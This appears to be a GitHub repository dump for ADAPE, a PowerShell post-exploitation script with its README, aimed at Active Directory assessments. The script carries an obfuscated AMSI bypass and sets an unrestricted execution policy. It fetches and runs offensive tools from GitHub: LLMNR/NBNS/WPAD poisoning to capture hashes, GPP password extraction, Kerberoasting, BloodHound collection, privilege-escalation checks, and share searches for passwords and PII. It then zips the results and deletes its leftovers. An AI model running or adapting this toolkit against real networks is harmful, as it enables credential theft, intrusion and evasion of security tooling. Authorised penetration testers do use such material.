├── .gitattributes ├── ADAPE.ps1 ├── README.md └── Screenshots └── ADAPE.PNG /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | -------------------------------------------------------------------------------- /ADAPE.ps1: -------------------------------------------------------------------------------- 1 | [CmdletBinding()] 2 | Param( 3 | [Int]$threads=20, 4 | [Parameter(Mandatory=$false)][switch]$Inv=$false, 5 | [Parameter(Mandatory=$false)][switch]$GPP=$false, 6 | [Parameter(Mandatory=$false)][switch]$Kerberoast=$false, 7 | [Parameter(Mandatory=$false)][switch]$Bloodhound=$false, 8 | [Parameter(Mandatory=$false)][switch]$PrivEsc=$false, 9 | [Parameter(Mandatory=$false)][switch]$PView=$false, 10 | [Parameter(Mandatory=$false)][switch]$All=$false 11 | ) 12 | Write-Host ' 13 | ______ _______ ______ _______ ________ 14 | / \ | \ / \ | \ | \ 15 | | $$$$$$\| $$$$$$$\| $$$$$$\| $$$$$$$\| $$$$$$$$ 16 | | $$__| $$| $$ | $$| $$__| $$| $$__/ $$| $$__ 17 | | $$ $$| $$ | $$| $$ $$| $$ $$| $$ \ 18 | | $$$$$$$$| $$ | $$| $$$$$$$$| $$$$$$$ | $$$$$ 19 | | $$ | $$| $$__/ $$| $$ | $$| $$ | $$_____ 20 | | $$ | $$| $$ $$| $$ | $$| $$ | $$ \ 21 | \$$ \$$ \$$$$$$$ \$$ \$$ \$$ \$$$$$$$$ 22 | ' -ForegroundColor Magenta 23 | 24 | Write-Host ' 25 | ############################################################# 26 | # # 27 | # Active Directory And Privilege Escalation Script v3.0 # 28 | # # 29 | # Developed By @Haus3c # 30 | # # 31 | #############################################################' -ForegroundColor Green 32 | 33 | <# 34 | .SYNOPSIS 35 | The purpose of this script is to run a few different things during the post-exploitation phase without having to port over multiple scripts. I didn't make the scripts used in this module, I'm not that smart. I just put it all together. 36 | Author: @haus3c 37 | License: BSD 3-Clause 38 | Required Dependencies: None 39 | Optional Dependencies: None 40 | 41 | .PARAMETER Inv 42 | Runs the Inveigh function. Responds to LLMNR, NBNS, and WPAD broadcasts for 5 minutes by default. Credit: @Kevin_Robertson. 43 | 44 | .PARAMETER GPP 45 | Runs the Group Policy Preferences function. Searches for local admin passwords in the SYSVOL share of DCs. Credit: @obscuresec 46 | 47 | .PARAMETER Kerberoast 48 | Runs the Kerberoast function. Queries for SPNs and their TGTs. Default storage is in Hashcat format because Hashcat>JtR. Credit: @TimMedin and @harmj0y 49 | 50 | .PARAMETER Bloodhound 51 | Runs the Bloodhound function which runs the Powershell 'sharphound' datacollector. Speed is optimized over stealth by default. Credit: @cptjesus, @wald0, @harmj0y 52 | 53 | .PARAMETER PrivEsc 54 | Runs the PrivEsc function which is running All Checks via the Power Up script. Credit: @harmj0y 55 | 56 | .PARAMETER PView 57 | Runs the Power view module. The full module is included so add whatever arguments you want in the function. By default it's looking for looking for open shares, sensitive files, exploitable systems, and domain policy. Credit: @mattifestation @harmj0y 58 | 59 | .PARAMETER All 60 | Does all of the above 61 | 62 | .EXAMPLE 63 | Set-ExecutionPolicy Bypass ./ADAPE.ps1 -All 64 | 65 | .EXAMPLE 66 | Set-ExecutionPolicy Bypass ./ADAPE.ps1 -Inv -GPP -Kerberoast 67 | 68 | #> 69 | 70 | Set-ExecutionPolicy Unrestricted 71 | #amsi bypass, disable if you think this will get you caught. 72 | [ScriptBlock].Assembly.GetType('System.Management.Automation.Am'+'siUtils')."GetF`ield"('am'+'siInitFailed','NonP'+'ublic,Static').SetValue($null,$true) 73 | #Admin Check 74 | If (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) 75 | { 76 | Write-Host "NOT running as Administrator; only Bloodhound+PrivEsc+Kerberoast modules enabled." 77 | } 78 | $ErrorActionPreference= 'silentlycontinue' 79 | $directory = pwd 80 | $path = $directory.path + "\Capture" 81 | $zip = $directory.path + "\Captured" 82 | #OSCheck 83 | $OS=(Get-WMIObject win32_operatingsystem).name 84 | $version = $OS.Substring(0, $OS.IndexOf("|")) 85 | New-Item -ItemType Directory -Force -Path $path | Out-Null 86 | Write-Host "Capture folder located at $path" -ForegroundColor Green 87 | Write-Host "OS Detected: $version" 88 | If( $OS -match "10" -or 89 | $OS -match "2012" -or 90 | $OS -match "2016" -or 91 | $OS -match "8") 92 | 93 | #Inveigh 94 | function Inveigh 95 | { 96 | New-Item -ItemType File -Force $path/Inv.psm1 | Out-Null 97 | $Inveigh = iwr -uri https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1 98 | [System.IO.File]::WriteAllText("$path/Inv.psm1", $Inveigh.content) 99 | Import-Module $path/Inv.psm1 100 | rm $path/Inv.psm1 101 | Write-Host "Attemping WPAD, LLMNR, and NBTNS poisoning" -ForegroundColor Yellow 102 | Invoke-Inveigh -ConsoleOutput N -NBNS Y -mDNS Y -HTTPS Y -FileOutput Y -FileOutputDirectory $path -RunTime 5 103 | } 104 | 105 | #GPP 106 | function GPP 107 | { 108 | $GPPP = iwr -uri https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Get-GPPPassword.ps1 109 | Write-Host "Checking for GPP Passwords" -ForegroundColor Yellow 110 | [System.IO.File]::WriteAllText("$path/GPP.ps1", $GPPP.content) 111 | Import-Module $path/GPP.ps1 112 | rm $path/GPP.ps1 113 | Get-GPPPassword 114 | } 115 | #Kerberoast 116 | function Kerberoast 117 | { 118 | $Kerb = iwr -uri https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 119 | Write-Host "Kerberoasting" -ForegroundColor Yellow 120 | [System.IO.File]::WriteAllText("$path/Kerb.ps1", $Kerb.content) 121 | Import-Module $path/Kerb.ps1 122 | rm $path/Kerb.ps1 123 | Invoke-Kerberoast 124 | } 125 | #Sharphound 126 | function Bloodhound 127 | { 128 | New-Item -ItemType Directory -Force -Path $path | Out-Null 129 | $directory = pwd 130 | $path = $directory.path + "\Capture" 131 | Write-Host "Sniffy boi sniffin" -ForegroundColor Yellow 132 | $spath = $path + "\sharp.exe" 133 | $sharp = iwr -uri https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.exe?raw=true 134 | Set-Content $spath -Value $sharp.content -Encoding Byte -Force 135 | Start-Process $spath 136 | } 137 | #PrivEsc 138 | function PrivEsc 139 | { 140 | $PrivEsc= iwr -uri https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1 141 | Write-Host "Collecting Privesc methods..." -ForegroundColor Yellow 142 | [System.IO.File]::WriteAllText("$path/PrivEsc.psm1", $PrivEsc.content) 143 | Import-Module $path/PrivEsc.psm1 144 | rm $path/PrivEsc.psm1 145 | Invoke-AllChecks | Out-File $path\PrivEsc.txt 146 | } 147 | #PowahView 148 | function PView 149 | { 150 | $PView= iwr -uri https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 151 | [System.IO.File]::WriteAllText("$path/PView.psm1", $PView.content) 152 | Import-Module $path/PView.psm1 153 | rm $path/PView.psm1 154 | Invoke-ShareFinder -CheckShareAccess -Threads 80 | Out-File $path\ShareFinder.txt 155 | Get-ExploitableSystem -Verbose | Export-Csv $path\ExploitableSystem.txt 156 | Get-NetFileServer | Out-File $path\FileServers.txt 157 | net share | Out-File $path\NetShare.txt 158 | Get-DomainPolicy | Out-File $path\DomainPolicy.txt 159 | Write-Host "Checking for exploitable systems..." -ForegroundColor Yellow 160 | Write-Host "Searching for file servers..." -ForegroundColor Yellow 161 | Write-Host "Checking for attached shares..." -ForegroundColor Yellow 162 | Write-Host "Grabbing Domain Policy..." -ForegroundColor Yellow 163 | 164 | } 165 | If ($Inv) { 166 | Inveigh 167 | } 168 | 169 | If ($GPP) { 170 | GPP 171 | } 172 | If ($Kerberoast){ 173 | Kerberoast 174 | } 175 | 176 | If ($Bloodhound) { 177 | Bloodhound 178 | } 179 | 180 | If ($PrivEsc) { 181 | PrivEsc 182 | } 183 | 184 | If ($PView) { 185 | PView 186 | } 187 | 188 | If ($All) { 189 | Inveigh 190 | GPP 191 | Kerberoast 192 | Bloodhound 193 | PrivEsc 194 | PView 195 | } 196 | #Zip it all up and remove leftovers 197 | 198 | Stop-Inveigh 199 | If($PSVersionTable.PsVersion.Major -lt 5) 200 | { 201 | Remove-Item -Recurse -Force $path + "\Inv.psm1" 202 | Remove-Item -Recurse -Force $path + "\sharp.exe" 203 | Write-Host "Not running PS5, cannot zip folder. Do it yoself." 204 | Write-Host "Done!" 205 | } 206 | else 207 | { 208 | Remove-Item -Recurse -Force $path + "\Inv.psm1" 209 | Remove-Item -Recurse -Force $path + "\sharp.exe" 210 | Compress-Archive -Force -Path $path -DestinationPath $zip 211 | Remove-Item -Recurse -Force $path 212 | Write-Host "Done! Results stored in the Captured.zip file!" -ForegroundColor Green 213 | } 214 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Active Directory Assessment and Privilege Escalation Script 2 | ![adape](https://github.com/hausec/ADAPE-Script/blob/master/Screenshots/ADAPE.PNG) 3 | 4 | I take absolutely no credit for the modules used in this script. Thanks to the original authors for the modules used in this script, credits and links below. 5 | 6 | Let's be honest, this is not a red team script. If you're worried about opsec, this script is not for you as it is loud. If you don't want to mess with the hassel of downloading multiple scripts during a pentest or risk assessment, then this might just be for you. In my previous engagements and assessments, I would run a few Powershell scripts that help identify next targets, check for bad group policy settings, AD misconfigs, missing patches, etc. This script combines the ones I used routinely and autoruns the functions I use in those scripts, outputting the results into a zip file. 7 | 8 | This script will do the following: 9 | 10 | • Gather hashes via WPAD, LLMNR, and NBT-NS spoofing 11 | 12 | • Check for GPP password (MS14-025) 13 | 14 | • Gather hashes for accounts via Kerberoast 15 | 16 | • Map out the domain and identify targets via BloodHound 17 | 18 | • Check for privilege escalation methods 19 | 20 | • Search for open SMB shares on the network 21 | 22 | • Search those shares and other accessible directories for sensitive files and strings (Passwords, PII, or whatever your want, really). By default it's looking for the term "password". If you wanted to search for CVVs for example, you'd just add it next to 'password', e.g. password,cvv 23 | 24 | • Check patches of systems on the network 25 | 26 | • Search for file servers 27 | 28 | • Search attached shares 29 | 30 | • Gather the domain policy 31 | 32 | This script requires access to Github, as it just pulls the scripts from Github and automates the collection process. There's an AMSI bypass 1-liner in it to bypass AMSI, so if if you think that will get you caught, feel free to comment it out. 33 | 34 | Modules used: 35 | 36 | | Module Name | Function | Author | Usage | 37 | |-------------|----------|--------|-------| 38 | |[Inveigh](https://github.com/Kevin-Robertson/Inveigh/blob/master/Inveigh.ps1) | `Invoke-Inveigh -ConsoleOutput N -NBNS Y -mDNS Y -HTTPS Y -FileOutput Y -FileOutputDirectory $path -RunTime 5` | @Kevin_Robertson | ADAPE.ps1 -Inv 39 | |[Kerberoast](https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1) | `Invoke-Kerberoast -OutputFormat Hashcat \| Out-File $path\Kerberoast.krb` | @harmj0y | ADAPE.ps1 -Kerberoast | 40 | |[Bloodhound](https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.exe)| `sharp.exe` | @harmj0y, @\_wald0, @CptJesus| ADAPE.ps1 -Bloodhound 41 | |[Get-GPPP](https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Get-GPPPassword.ps1)| `Get-GPP`|@obscuresec, @harmj0y| ADAPE.ps1 -GPP 42 | |[PowerUp](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1)|`Invoke-AllChecks \| Out-File $path\PrivEsc.txt`|@harmj0y, @mattifestation|ADAPE.ps1 -PrivEsc 43 | |[PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)| `Invoke-ShareFinder -CheckShareAccess -Threads 80 \| Out-File $path\ShareFinder.txt` `Get-ExploitableSystem -Verbose \| Export-Csv $path\ExploitableSystem.txt` `Get-NetFileServer \| Out-File $path\FileServers.txt` `net share \| Out-File $path\NetShare.txt` `Get-DomainPolicy \| Out-File $path\DomainPolicy.txt`|@harmj0y, @mattifestation|ADAPE.ps1 -PView 44 | |Everything at once (All of the Above)| n/a|See above| ADAPE.ps1 -All 45 | 46 | All modules in the script require Administrative access except for Bloodhound and PrivEsc (PowerUp). 47 | 48 | After running the .ps1, it will create the capture file in the same folder it's being ran in and zips it. If you're running Windows 7 and below it won't zip, so you'll have to do that yourself. At the end of the script, it deletes all the folders it created (except the .zip file, obviously). 49 | 50 | GPP password checking and searching sensitive files takes awhile, so don't be surprised if this script takes a long time to finish depending on the number of domain controllers, open shares, and strings you're searching for. Comment those sections out if they take too long to run. 51 | 52 | Usage: 53 | 54 | `Set-ExecutionPolicy Bypass ` 55 | `./ADAPE.ps1 -All` 56 | or 57 | `./ADAPE.ps1 -GPP -PView -Kerberoast` 58 | etc. 59 | -------------------------------------------------------------------------------- /Screenshots/ADAPE.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hausec/ADAPE-Script/4d0b9ff4f1f94f824364fc846102048b7ac71ea4/Screenshots/ADAPE.PNG --------------------------------------------------------------------------------